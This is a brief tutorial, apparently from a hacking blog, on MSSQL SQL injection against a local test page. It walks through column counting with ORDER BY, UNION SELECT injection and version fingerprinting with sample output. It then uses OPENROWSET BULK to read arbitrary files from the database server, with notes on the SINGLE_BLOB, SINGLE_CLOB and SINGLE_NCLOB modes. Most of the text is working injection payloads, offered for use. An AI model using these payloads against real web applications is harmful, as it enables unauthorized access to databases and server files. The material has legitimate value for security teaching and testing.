READING FILES IN MSSQL INJECTION – TUTORIAL

1. Vulnerable Link:
2. 127.0.0.1/search3.php?name=username
3. Getting Columns:
4. 127.0.0.1/search3.php?name=username order by 1--
5. Selecting Columns:
6. 127.0.0.1/search3.php?name=username union select 1--
7. Checking Version:
8. 127.0.0.1/search3.php?name=username union select @@version--
9. Output: Microsoft SQL Server 2014 – 12.0.2000.8 (X64) Feb 20 2014 20:04:26 Copyright (c) Microsoft Corporation Express Edition (64-bit) on Windows NT 6.2 (Build 9200: )
10.  
11. Reading Files:
12. 127.0.0.1/search3.php?name=username union select * FROM OPENROWSET (BULK 'C:\xampp\htdocs\HereWeGo.txt', SINGLE_CLOB) MyFile
13. This is my simple query related to OEPNROWSET.
14.  
15. Explanation:
16. OPENROWSET: OPENROWSET is a function that allows you to read Data using SQL Server’s BULK import capability. You can actually read anything you want on that Sql Server as long as you have the Full Path Related to It and as long as your MsSql User have the privileges to deal with Files.
17. BULK: This can be explained by reading 1.
18. SINGLE_CLOB: Okay, there’s 3 different types:
19. SINGLE_BLOB, which reads a file as varbinary
20. SINGLE_CLOB, which reads a file as varchar
21. SINGLE_NCLOB, which reads a file as nvarchar